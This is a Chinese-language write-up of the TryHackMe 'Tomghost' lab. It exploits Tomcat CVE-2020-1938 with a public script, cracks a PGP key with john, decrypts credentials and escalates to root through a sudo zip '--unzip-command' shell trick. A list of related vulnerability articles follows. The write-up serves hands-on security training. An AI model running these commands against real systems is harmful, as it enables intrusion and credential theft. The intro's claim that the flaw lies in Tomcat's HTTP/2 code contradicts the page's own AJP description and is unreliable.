【靶机】Tomghost-Tomcat-CVE-2020-1938

简介: CVE-2020-1938是一个安全漏洞,涉及Apache Tomcat中的HTTP/2实现。该漏洞可以被恶意攻击者利用来访问服务器上的敏感信息,甚至可能导致执行任意代码。本靶机将对其进行复现。

!!!

 

Tomghost

Identify recent vulnerabilities to try exploit the system or read files that you should not have access to.

bilibili

https://www.bilibili.com/video/BV13G4y1B7WT

信息搜索

扫下端口

Snipaste_2022-09-17_22-47-16

扫描目录,不过没什么收获

我们搜下tomcat 9.0.30

找到漏洞

CVE-2020-1938

CVE-2020-1938

 

  • Apache Tomcat 9.x < 9.0.31
  • Apache Tomcat 8.x < 8.5.51
  • Apache Tomcat 7.x < 7.0.100
  • Apache Tomcat 6.x

exphub/tomcat at master · zhzyker/exphub (github.com)

python2 ./p.py 10.10.106.85

 

直接利用

Snipaste_2022-09-17_23-51-06

拿到skyfuck权限

我们看到加密文件,尝试解密下

 

convert

 

ASC文件是加密软件PGP(Pretty Good Privacy)

gpg2john ——— .asc

复制tryhackme.asc到kali改名1.asc

gpg2john 1.asc > 1

john –wordlist=rockyou.txt 1

然后得到密钥

Snipaste_2022-09-17_23-54-42

gpg -import tryhackme.asc

gpg - -decrypt credential.pgp

Snipaste_2022-09-17_23-34-20

 

 

sodo -l

Snipaste_2022-09-17_23-47-10

touch 1.txt

sudo zip 1.zip 1.txt -T --unzip-command="sh -c /bin/bash"

Snipaste_2022-09-17_23-47-43

 

linux zip 提权YouthBelief的博客-CSDN博客zip提权

!!!

目录
相关文章
|
Web App开发 安全 Java
WebLogic Server 远程代码执行漏洞(CVE-2021-2109)
WebLogic Server 远程代码执行漏洞,攻击者可通过使用恶意Payload对目标服务器实施攻击并接管服务器获取执行权限。
419 1
|
安全 Java 应用服务中间件
WebLogic Server 远程代码执行漏洞(CVE-2023-21839/CNVD-2023-04389)
WebLogic Server 存在远程代码执行漏洞,攻击者通过特定Payload对目标服务器进行恶意利用从而获取服务器控制权限,进一步操作。
342 1
|
安全 应用服务中间件 Apache
Apache-Tomcat-Ajp文件读取漏洞(CVE-2020-1938、CNVD-2020-10487)
Apache-Tomcat-Ajp文件读取漏洞产生原因是由于Tomcat默认开启的AJP服务(8009端口)存在一处文件包含缺陷,攻击者可构造恶意的请求包进行文件包含操作,进而读取受影响Tomcat服务器上的Web目录文件
745 1
|
安全 Java 应用服务中间件
干货 | Tomcat漏洞复现总结
干货 | Tomcat漏洞复现总结
1018 0
|
JSON 供应链 安全
Apache Tomcat 存在 JsonErrorReportValve 注入漏洞(CVE-2022-45143)
Apache Tomcat 存在 JsonErrorReportValve 注入漏洞(CVE-2022-45143)
Apache Tomcat 存在 JsonErrorReportValve 注入漏洞(CVE-2022-45143)
|
安全 Apache
CVE-2021-42013 Apache HTTPd 2.4.49 2.4.50 路径穿越以及RCE漏洞
影响版本 Apache 2.4.49 Apache 2.4.50 当前描述 发现Apache HTTP Server 2.4.50中对CVE-221-41773的修复不足。攻击者可以使用路径遍历攻击将URL映射到Alias类指令配置的目录之外的文件。如果这些目录之外的文件不受通常默认配置“要求全部拒绝”的保护,这些请求可能会成功。如果还为这些别名路径启用了CGI脚本,这可能允许远程代码执行。此问题仅影响Apache 2.4.49和Apache 2.4.50,而不影响早期版本。 环境搭建可以查看我的上一篇文章 https://developer.aliyun.com/article/11136
376 0
CVE-2021-42013 Apache HTTPd 2.4.49 2.4.50 路径穿越以及RCE漏洞
|
安全 前端开发 Java
weblogic-CVE-2109漏洞分析
weblogic-CVE-2109漏洞分析
weblogic-CVE-2109漏洞分析
|
安全 Java 中间件
CVE-2020-1938 Aapache Tomcat AJP 文件包含漏洞
CVE-2020-1938 Aapache Tomcat AJP 文件包含漏洞
123 0
CVE-2020-1938 Aapache Tomcat AJP 文件包含漏洞
|
安全 应用服务中间件 nginx
tomcat安全加固
安全加固,Tomcat是重灾区。所以整理下Tomcat的安全加固。 1. 升级到最新稳定版,这个是老生常谈了。目前Tomcat支持6.0和7.0两个版本。 1) 出于稳定性考虑,不建议进行跨版本升级,如果之前是6.0系列版本,最好还是使用该系列的最新版本。
1574 0
|
安全 前端开发 Java
Tomcat 爆出高危漏洞!
Tomcat 爆出高危漏洞!
312 0
Tomcat 爆出高危漏洞!